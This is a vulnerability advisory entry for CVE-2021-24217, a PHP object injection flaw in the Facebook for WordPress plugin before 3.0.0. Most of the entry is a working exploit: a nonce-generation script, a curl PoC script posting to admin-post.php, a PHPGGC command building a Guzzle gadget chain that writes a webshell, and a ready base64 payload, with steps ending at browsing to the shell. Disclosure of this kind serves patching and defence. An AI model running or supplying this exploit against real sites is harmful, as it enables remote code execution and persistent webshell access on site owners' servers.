Lucene search
Chloe ChamberlandWPEX-ID:509F2754-A1A1-4142-9126-AE023A88533AHistoryMar 25, 2021 - 12:00 a.m.
Facebook for WordPress < 3.0.0 - PHP Object Injection with POP Chain
2021-03-2500:00:00
Chloe Chamberland
97
The run_action function of the plugin deserializes user supplied data making it possible for PHP objects to be supplied creating an Object Injection vulnerability. There was also a useable magic method in the plugin that could be used to achieve remote code execution.
Step 1: Use the nonce generation script to generate a valid nonce.
Step 2: Run the POC script like:
php poc.php site.com nonce base64payload
Step 3: Navigate to the shell
http://mysite.com/webshell.php
Nonce Generation Script
-----
<?php
$nonce_key = '[SITE NONCE KEY HERE]';
$nonce_salt = '[SITE SALT HERE]';
function wp_nonce_tick() {
return ceil( time() / ( 86400 / 2 ) );
}
function wp_hash( $data, $scheme = 'auth', $nonce_key, $nonce_salt) {
$salt = $nonce_key . $nonce_salt;
echo "Is this a real salt? " . $salt . "\n";
return hash_hmac( 'md5', $data, $salt );
}
$i = wp_nonce_tick();
echo "Here is your Nonce: " . substr( wp_hash( $i ."wp_async_send_server_eventsFacebookPixelPlugin\Core\ServerEventAsyncTask", 'nonce', $nonce_key,
$nonce_salt), - 12, 10 )
?>
PoC Script
<?php
// Settings
$siteurl = $argv[1];
$nonce = $argv[2];
$payload = $argv[3];
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $siteurl . '/wp-admin/admin-post.php' );
curl_setopt( $ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13' );
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
curl_setopt( $ch, CURLOPT_POST, true );
curl_setopt( $ch, CURLOPT_POSTFIELDS, [
'action' => 'wp_async_send_server_events',
'_nonce' => $nonce,
'num_events' => '1',
'event_data' => $payload
] );
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>
Generate a working payload with PHPGGC, or other custom script - make sure data is base64encoded on output so null characters don't get lost.
./phpggc Guzzle/FW1 /var/www/html/webshell.php ~/path/to/shell.php -b
Sometimes the payload is finicky so you may need to take the payload into Burp Decoder to decode and modify your payload while keeping the null characters. The following payload should work on most standard instances:
TzozMToiR3V6emxlSHR0cFxDb29raWVcRmlsZUNvb2tpZUphciI6NDp7czo0MToiAEd1enpsZUh0dHBcQ29va2llXEZpbGVDb29raWVKYXIAZmlsZW5hbWUiO3M6MjY6Ii92YXIvd3d3L2h0bWwvd2Vic2hlbGwucGhwIjtzOjUyOiIAR3V6emxlSHR0cFxDb29raWVcRmlsZUNvb2tpZUphcgBzdG9yZVNlc3Npb25Db29raWVzIjtiOjE7czozNjoiAEd1enpsZUh0dHBcQ29va2llXENvb2tpZUphcgBjb29raWVzIjthOjE6e2k6MDtPOjI3OiJHdXp6bGVIdHRwXENvb2tpZVxTZXRDb29raWUiOjE6e3M6MzM6IgBHdXp6bGVIdHRwXENvb2tpZVxTZXRDb29raWUAZGF0YSI7YTo1OntzOjQ6Ik5hbWUiO3M6NDoidGVzdCI7czo1OiJWYWx1ZSI7czoxODoiPD9waHAgcGhwaW5mbygpOz8+IjtzOjc6IkRpc2NhcmQiO2I6MDtzOjc6IkV4cGlyZXMiO2k6MTt9fX1zOjM5OiIAR3V6emxlSHR0cFxDb29raWVcQ29va2llSmFyAHN0cmljdE1vZGUiO047fQ==Related
cve
cve
CVE-2021-24217
2021-04-12 14:15:00
prion
prion
Design/Logic Flaw
2021-04-12 14:15:00
wpvulndb
wpvulndb
Facebook for WordPress < 3.0.0 - PHP Object Injection with POP Chain
2021-03-25 00:00:00
openvas
openvas
Related for WPEX-ID:509F2754-A1A1-4142-9126-AE023A88533A